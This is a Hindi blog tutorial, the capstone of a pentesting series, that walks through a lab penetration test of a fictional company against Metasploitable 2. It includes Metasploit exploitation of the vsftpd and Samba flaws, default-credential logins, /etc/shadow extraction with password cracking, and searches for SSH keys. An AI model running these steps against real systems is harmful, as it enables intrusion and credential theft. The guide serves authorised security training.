मेनू
परिचय सेवाएँ यात्रा मेरे साथ काम करें
Security operations center
सुरक्षा 8 मार्च, 2026 • 30 मिनट पढ़ें

पूर्ण ऑडिट: शुरू से अंत तक एक पूर्ण पेनेट्रेशन टेस्ट

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

साझा करें:
Lee Foropoulos

Lee Foropoulos

30 मिनट पढ़ें

हैकर का मार्ग: 5-भाग श्रृंखला

भाग 1: परिचयभाग 2: Flipper में महारतभाग 3: Kali की बुनियादभाग 4: एक्सप्लॉइटेशनभाग 5: पूर्ण ऑडिट

आपने यह श्रृंखला यह सोचते हुए शुरू की कि हैकर्स वास्तव में क्या करते हैं। आपने सीखा कि यह हुडी और हरे टेक्स्ट के बारे में नहीं है। यह व्यवस्थित समस्या-समाधान है। आपने बैज क्लोन किए, नेटवर्क मैप किए, handshakes कैप्चर किए और कमजोर मशीनों पर shells प्राप्त किए।

अब हम सब कुछ एक साथ जोड़ते हैं। यह लेख आपको एक काल्पनिक लक्ष्य के खिलाफ एक पूर्ण पेनेट्रेशन टेस्ट के माध्यम से ले जाता है। हर चरण, हर निर्णय, हर खोज, ठीक वैसे ही प्रलेखित जैसे एक पेशेवर करेगा।

परिदृश्य

क्लाइंट: Initech Labs (एक काल्पनिक छोटी टेक कंपनी)

दायरा: आंतरिक नेटवर्क पेनेट्रेशन टेस्ट

लक्ष्य: कमजोरियों की पहचान करना और संभावित व्यापार प्रभाव प्रदर्शित करना

आपका लक्ष्य: आपका अपना लैब नेटवर्क (Kali + Metasploitable 2 + कोई अन्य VM जो आपने सेटअप किया)

एक कॉफी बनाएं। यह मजेदार होने वाला है।

चरण 1: पूर्व-संलग्नता

कीबोर्ड छूने से पहले, पेशेवर पेंटेस्टर व्यापार पक्ष को संभालते हैं। इसे छोड़ दें, और आप पेंटेस्टर नहीं हैं। आप बस अपराध कर रहे हैं।

स्कोपिंग कॉल

एक वास्तविक संलग्नता में, आप क्लाइंट से कॉल करेंगे:

  • दायरे में क्या है? कौन से नेटवर्क, IP रेंज, एप्लिकेशन?
  • दायरे से बाहर क्या है? प्रोडक्शन सिस्टम? तृतीय-पक्ष सेवाएं?
  • टेस्टिंग विंडो? कब टेस्ट कर सकते हैं? केवल कार्य घंटे?
  • संपर्क बिंदु? कुछ टूटे तो किसे कॉल करें?
  • लक्ष्य? अनुपालन चेकबॉक्स या वास्तविक सुरक्षा सुधार?

आपकी लैब के लिए

दायरा: केवल आपका पृथक लैब नेटवर्क। दायरे से बाहर: बाकी सब कुछ। टेस्टिंग विंडो: जब चाहें। लक्ष्य: करके सीखना।

संलग्नता के नियम

वास्तविक संलग्नताओं में लिखित नियम होते हैं:

  • प्राधिकरण पत्र - हस्ताक्षरित दस्तावेज जो साबित करता है कि आपके पास अनुमति है
  • एस्केलेशन प्रक्रियाएं - अगर कुछ गंभीर मिले तो क्या करें
  • डेटा हैंडलिंग - संवेदनशील डेटा कैसे संभालें
  • सफाई आवश्यकताएं - समाप्त होने पर सभी टूल्स और बैकडोर हटाएं
  • रिपोर्ट की समयसीमा - अंतिम रिपोर्ट कब देनी है?

हमेशा लिखित अनुमति प्राप्त करें

"दोस्ताना" टेस्ट के लिए भी। एक हस्ताक्षरित ईमेल जो कहता है "आपको मेरे नेटवर्क को तारीख से तारीख तक टेस्ट करने की अनुमति है" एक सीखने के अनुभव और आपराधिक सजा के बीच का अंतर हो सकता है। इसे गंभीरता से लें।

चरण 2: रिकनाइसेंस

लक्ष्य के बारे में सब कुछ जानने का समय। वास्तविक संलग्नता में, इसमें OSINT शामिल होगा: Google खोज, LinkedIn प्रोफाइल, कंपनी वेबसाइट, DNS रिकॉर्ड। हमारी लैब के लिए, हम सीधे सक्रिय रिकनाइसेंस पर जाते हैं।

कदम 1: नेटवर्क खोज

पहला सवाल: इस नेटवर्क पर क्या है?

bash# अपनी नेटवर्क रेंज खोजें
ip a | grep inet
# कुछ ऐसा खोजें: inet 192.168.56.100/24

# सभी लाइव होस्ट खोजें
sudo nmap -sn 192.168.56.0/24 -oA discovery

# परिणाम (उदाहरण):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

सब कुछ प्रलेखित करें:

text# Initech Labs - नेटवर्क खोज
# तिथि: 2026-03-08
# परीक्षक: आपका नाम

192.168.56.1   - Gateway/Router
192.168.56.101 - अज्ञात (जांच करनी है)
192.168.56.102 - अज्ञात (जांच करनी है)

कदम 2: पोर्ट स्कैनिंग

अब गहराई में जाते हैं। कौन सी सेवाएं चल रही हैं?

bash# सेवा पहचान के साथ पूर्ण पोर्ट स्कैन
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# सीखने के दौरान तेज परिणामों के लिए:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Metasploitable 2 पर, आपको खजाना दिखेगा:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

क्या एक्सपोजर है। नोट्स अपडेट करें:

text192.168.56.101 - Linux Server (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # ज्ञात बैकडोर!
  - SSH (22): OpenSSH 4.7p1      # प्राचीन
  - Telnet (23): सक्रिय           # 2026 में यह क्यों मौजूद है?
  - HTTP (80): Apache 2.2.8      # वेब ऐप्स टेस्ट करने के लिए
  - SMB (139/445): Samba 3.X     # संभावित सोने की खान
  - MySQL (3306): 5.0.51a        # डेटाबेस एक्सेस?
  - PostgreSQL (5432): सक्रिय    # एक और DB

कदम 3: कमजोरी पहचान

देखते हैं वास्तव में क्या एक्सप्लॉइट किया जा सकता है।

bash# कमजोरी स्क्रिप्ट चलाएं
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Metasploit में विशिष्ट सेवाएं जांचें
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

vsftpd 2.3.4 बैकडोर तुरंत दिखता है। यह एक गारंटीड shell है। लेकिन एक अच्छा पेंटेस्टर पहली खोज पर नहीं रुकता। सब कुछ प्रलेखित करें।

ब्लिंकिंग नेटवर्क उपकरण के साथ सर्वर रूम
गहन रिकनाइसेंस एकल exploit चलाने से पहले पूरी हमले की सतह को मैप करता है। हर खुला पोर्ट और सेवा संस्करण आपके मूल्यांकन में एक डेटा पॉइंट बन जाता है।

चरण 3: एक्सप्लॉइटेशन

यहां चीजें रोमांचक होती हैं। हमारे पास कई संभावित प्रवेश बिंदु हैं। व्यवस्थित रूप से काम करें।

अटैक वेक्टर 1: FTP बैकडोर

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

प्रलेखित खोज: FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।

FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।

लेकिन हम यहां नहीं रुकते। और क्या एक्सेस कर सकते हैं?

अटैक वेक्टर 2: Samba

bashbackground

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

एक अलग वेक्टर के माध्यम से एक और root shell। पूर्ण समझौते के दो स्वतंत्र रास्ते।

अटैक वेक्टर 3: वेब एप्लिकेशन

देखते हैं पोर्ट 80 पर क्या चल रहा है।

bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# परिणाम:
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

nikto -h http://192.168.56.101

डिफॉल्ट क्रेडेंशियल्स वाला phpMyAdmin? जांचें:

textUsername: root
Password: (खाली)

# एक्सेस मिल गया!

बिना पासवर्ड के डेटाबेस एडमिन एक्सेस। यहां से, हम सारा डेटा निकाल सकते हैं, रिकॉर्ड संशोधित कर सकते हैं या MySQL की फाइल ऑपरेशन का उपयोग करके web shell लिख सकते हैं।

अटैक वेक्टर 4: कमजोर SSH क्रेडेंशियल्स

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

कमजोर क्रेडेंशियल्स SSH एक्सेस देते हैं। Root नहीं, लेकिन पोस्ट-एक्सप्लॉइटेशन में संभालेंगे।

चरण 4: पोस्ट-एक्सप्लॉइटेशन

हमारे पास एक्सेस है। अब क्या? एक वास्तविक पेनेट्रेशन टेस्ट व्यापार प्रभाव प्रदर्शित करता है।

क्रेडेंशियल हार्वेस्टिंग

bashcat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

नेटवर्क रिकनाइसेंस (अंदर से)

bashifconfig
route -n
cat /etc/hosts
arp -a

netstat -tulpn
ss -tulpn

find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

संवेदनशील डेटा की खोज

bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

mysql -u root -p
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

प्रिविलेज एस्केलेशन (msfadmin से)

msfadmin के रूप में SSH लॉगिन याद है? भाग 4 में सीखे गए का उपयोग करके root तक बढ़ें।

bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
साइबर सुरक्षा उपकरणों के साथ डेस्क पर काम करता पेशेवर
पोस्ट-एक्सप्लॉइटेशन वास्तविक व्यापार प्रभाव प्रदर्शित करता है। कमजोरी स्कैन और पेनेट्रेशन टेस्ट के बीच का अंतर यह साबित करना है कि एक हमलावर वास्तव में एक्सेस के साथ क्या कर सकता है।

चरण 5: प्रलेखन और निष्कर्ष

रिपोर्ट के बिना टेस्ट बेकार है। यह पेशेवरों को script kiddies से अलग करता है।

निष्कर्षों का सारांश

"Initech Labs" नेटवर्क पर हमने जो पाया, वास्तविक रिपोर्ट के प्रारूप में:

गंभीर: FTP सेवा बैकडोर (CVE-2011-2523)

प्रभावित सिस्टम: 192.168.56.101

जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन

प्रमाण: 60 सेकंड से कम में पूर्ण root shell प्राप्त

सिफारिश: vsftpd को तुरंत वर्तमान संस्करण में अपडेट करें या FTP सेवा पूरी तरह बंद करें।

गंभीर: Samba रिमोट कोड निष्पादन

प्रभावित सिस्टम: 192.168.56.101

जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन

प्रमाण: usermap_script exploit के माध्यम से पूर्ण root shell प्राप्त

सिफारिश: Samba को वर्तमान संस्करण में अपडेट करें। SMB एक्सेस केवल आवश्यक सिस्टम तक सीमित करें।

उच्च: बिना पासवर्ड MySQL Root एक्सेस

प्रभावित सिस्टम: 192.168.56.101

जोखिम: पूर्ण डेटाबेस समझौता, डेटा चोरी, web shell परिनियोजन

प्रमाण: phpMyAdmin के माध्यम से खाली पासवर्ड से root के रूप में लॉगिन

सिफारिश: मजबूत root पासवर्ड सेट करें। phpMyAdmin एक्सेस प्रतिबंधित करें।

उच्च: कमजोर SSH क्रेडेंशियल्स

प्रभावित सिस्टम: 192.168.56.101

जोखिम: प्रमाणित एक्सेस जो प्रिविलेज एस्केलेशन की ओर ले जाता है

प्रमाण: msfadmin:msfadmin सफलतापूर्वक प्रमाणित

सिफारिश: मजबूत पासवर्ड नीति लागू करें। SSH कुंजी-आधारित प्रमाणीकरण लागू करें।

मध्यम: Telnet सेवा सक्षम

प्रभावित सिस्टम: 192.168.56.101

जोखिम: क्रेडेंशियल्स सादे पाठ में प्रेषित

सिफारिश: Telnet बंद करें। सभी रिमोट प्रशासन के लिए SSH का उपयोग करें।

निम्न: उजागर phpinfo() पेज

प्रभावित सिस्टम: 192.168.56.101

सिफारिश: phpinfo पेज हटाएं या एक्सेस प्रतिबंधित करें।

कार्यकारी सारांश

कार्यकारी सारांश

Initech Labs के आंतरिक नेटवर्क के पेनेट्रेशन टेस्ट के दौरान, सुरक्षा टीम ने मूल्यांकन शुरू करने के 10 मिनट के भीतर मुख्य सर्वर का पूर्ण प्रशासनिक नियंत्रण प्राप्त किया।

प्रमुख निष्कर्ष:

10 min
बिना पैच सेवाओं वाले सर्वर पर पहले स्कैन से पूर्ण root समझौते तक का समय।
  • 2 गंभीर कमजोरियां जो तुरंत रिमोट टेकओवर की अनुमति देती हैं
  • 2 उच्च-गंभीरता मुद्दे जो डेटाबेस और उपयोगकर्ता क्रेडेंशियल्स उजागर करते हैं
  • कई मध्यम और निम्न निष्कर्ष जो प्रणालीगत सुरक्षा अंतराल दर्शाते हैं

निष्कर्ष: बुनियादी कौशल वाला हमलावर इस सिस्टम को मिनटों में पूरी तरह समझौता कर सकता है। सभी गंभीर और उच्च निष्कर्षों के लिए तत्काल उपचार आवश्यक है।

चरण 6: सफाई और समापन

एक पेशेवर पेंटेस्टर वातावरण को ठीक वैसे ही छोड़ता है जैसा उसने पाया।

bashmsf6 > sessions -l
msf6 > sessions -K

rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keys

वास्तविक संलग्नता में, आप यह भी करेंगे:

  • टेस्टिंग के दौरान अपलोड किए गए सभी टूल्स हटाएं
  • वातावरण में किए गए किसी भी बदलाव को प्रलेखित करें
  • निकाले गए डेटा के hashes/checksums प्रदान करें
  • रिपोर्ट वितरण के बाद सभी क्लाइंट डेटा सुरक्षित रूप से हटाएं

पूर्ण कार्यप्रणाली चेकलिस्ट

किसी भी पेनेट्रेशन टेस्ट के लिए आपका पुन: प्रयोज्य वर्कफ़्लो:

पेनेट्रेशन टेस्ट कार्यप्रणाली

  1. पूर्व-संलग्नता
    • दायरा और संलग्नता नियम परिभाषित करें
    • लिखित प्राधिकरण प्राप्त करें
    • संचार चैनल स्थापित करें
    • परीक्षण वातावरण सेटअप करें
  2. रिकनाइसेंस
    • नेटवर्क खोज (होस्ट एन्यूमरेशन)
    • पोर्ट स्कैनिंग और सेवा पहचान
    • कमजोरी स्कैनिंग
    • वेब एप्लिकेशन एन्यूमरेशन
    • सब कुछ प्रलेखित करें
  3. एक्सप्लॉइटेशन
    • कमजोरियों को मान्य करें (स्कैनर पर आंख बंद करके भरोसा न करें)
    • पुष्टि की गई कमजोरियों का शोषण करें
    • हर सफल समझौते को प्रलेखित करें
    • साक्ष्य कैप्चर करें (स्क्रीनशॉट, लॉग)
  4. पोस्ट-एक्सप्लॉइटेशन
    • समझौता किए गए सिस्टम की गणना करें
    • क्रेडेंशियल्स इकट्ठा करें
    • संवेदनशील डेटा की पहचान करें
    • प्रिविलेज एस्केलेशन का प्रयास करें
    • लेटरल मूवमेंट के अवसर खोजें
  5. रिपोर्टिंग
    • कार्यकारी सारांश लिखें (व्यापार प्रभाव)
    • सभी निष्कर्ष साक्ष्य के साथ प्रलेखित करें
    • उपचार सिफारिशें प्रदान करें
    • IT टीमों के लिए तकनीकी विवरण शामिल करें
  6. सफाई
    • सभी टूल्स और आर्टिफैक्ट्स हटाएं
    • सभी सत्र और बैकडोर बंद करें
    • वातावरण बदलाव प्रलेखित करें
    • क्लाइंट डेटा सुरक्षित रूप से संभालें
पूर्ण ऑडिट कार्य योजना 0/6

आगे क्या: आपका मार्ग

आपने हैकर का मार्ग पूरा कर लिया। आप "हैकिंग का मतलब क्या है?" से पूर्ण पेनेट्रेशन टेस्ट करने तक पहुंचे। यह वास्तव में प्रभावशाली है।

लेकिन यह बस शुरुआत है। यहां से आगे जाएं:

अभ्यास प्लेटफॉर्म

  • Hack The Box - अभ्यास के लिए यथार्थवादी मशीनें। "आसान" रिटायर्ड बॉक्स से शुरू करें।
  • TryHackMe - निर्देशित सीखने के रास्ते।
  • VulnHub - डाउनलोड और स्थानीय अभ्यास के लिए मुफ्त कमजोर VMs।
  • PentesterLab - वेब एप्लिकेशन सुरक्षा पर केंद्रित।

प्रमाणपत्र (यदि चाहें)

  • eJPT - उत्कृष्ट शुरुआती बिंदु, व्यावहारिक परीक्षा
  • OSCP - उद्योग मानक, कठिन लेकिन सम्मानित
  • PNPT - आधुनिक, व्यावहारिक, रिपोर्ट लेखन शामिल
  • CEH - कॉर्पोरेट आवश्यकताओं के लिए, कम व्यावहारिक

विशेषज्ञताएं

  • वेब एप्लिकेशन सुरक्षा - OWASP, Burp Suite, SQL injection, XSS
  • Active Directory - अधिकांश कॉर्पोरेट वातावरण इसका उपयोग करते हैं
  • क्लाउड सुरक्षा - AWS, Azure, GCP पेंटेस्टिंग
  • मोबाइल सुरक्षा - Android/iOS एप्लिकेशन परीक्षण
  • Red Teaming - पूर्ण विरोधी सिमुलेशन, भौतिक + डिजिटल
  • रिवर्स इंजीनियरिंग - मालवेयर विश्लेषण, एक्सप्लॉइट विकास

अपनी होम लैब बनाएं

सबसे अच्छे पेंटेस्टर्स के पास विस्तृत होम लैब होती हैं। सरल शुरू करें:

  • Active Directory के साथ Windows Server जोड़ें
  • Domain controller सेटअप करें
  • कमजोर वेब एप्लिकेशन परिनियोजित करें (DVWA, bWAPP, WebGoat)
  • कई सेगमेंट के साथ नेटवर्क बनाएं
  • रक्षक के दृष्टिकोण से हमले देखने के लिए HoneyAegis जोड़ें

हैकर का मार्ग: पूर्ण

आपने यह कर दिया। सभी पांच भाग, जिज्ञासु से सक्षम तक।

भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियाद भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट

श्रृंखला पूर्ण - आपकी यात्रा

भाग 1: आपने सीखा कि हैकिंग वास्तव में क्या है और Flipper Zero के साथ अपनी पहली जीत हासिल की

भाग 2: आपने हर Flipper प्रोटोकॉल में महारत हासिल की: Sub-GHz, RFID, NFC, BadUSB, GPIO

भाग 3: आपने अपनी Kali लैब बनाई, nmap सीखा और WiFi handshakes कैप्चर किए

भाग 4: आपने Metasploit, एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन और pivoting में महारत हासिल की

भाग 5: आपने सब कुछ एक पूर्ण पेनेट्रेशन टेस्टिंग कार्यप्रणाली में जोड़ दिया

सुरक्षा एक गंतव्य नहीं है। यह एक अभ्यास है। उपकरण बदलेंगे, कमजोरियां विकसित होंगी, लेकिन कार्यप्रणाली वही रहती है। सब कुछ पर सवाल उठाएं। सब कुछ प्रलेखित करें। सीखना कभी बंद न करें।

दूसरी तरफ आपका स्वागत है।

  • Lee
How was this article?

साझा करें

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Koi bhi post na chookeN

Naye lekh prakashit hone par suchna prapt kareN. Email ki zaroorat nahiN.

Nayi post hone par site par ek banner dikhega, aur browser notification bhi agar aap anumati dete hain.

Keval browser soochnaeN. Koi spam nahiN.